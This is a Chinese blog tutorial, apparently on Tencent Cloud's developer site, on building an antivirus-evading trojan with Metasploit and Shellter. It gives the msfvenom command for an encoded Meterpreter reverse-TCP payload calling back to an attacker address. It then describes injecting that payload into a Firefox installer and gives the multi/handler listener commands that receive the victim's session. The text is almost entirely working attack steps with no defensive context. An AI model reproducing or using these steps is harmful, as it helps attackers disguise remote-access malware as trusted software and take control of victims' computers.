文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

网络安全

12 篇文章
1
CrystalNet:超逼真地仿真大型生产网络
2
NIST《网络靶场指南》浅析
3
靶场发展态势⑦持续网络训练环境(PCTE)1
4
PenTBox - 开源安全套件
5
Metasploit 的 payload 特征
6
Metasploit渗透测试指南(全)
7
Metasploit从入门到入坟
8
Docker 从入门到入土
9
Cobalt Strike|从入门到入狱
10
使用Metasploit&Shellter 捆绑免杀
11
Metasploit 一条龙服务
12
Beef框架中加载metasploit模块
清单首页网络安全文章详情
清单「网络安全10/12

使用Metasploit&Shellter 捆绑免杀

C4rpeDime·黑白安全创始人

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用

Shellter

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

准备

  • 使用kali linux
  • 安装 shellter apt install shellter 或者 官网下载

1.使用Metasploit生成 payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw

2.使用Shellter选择捆绑exe文件

  • 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例

3.把 fud.raw 注入到exe程序

4.启动Metasploit监听

代码语言:javascript
复制
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线

  • 杀毒引擎扫描结果
下一篇
举报

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287

领券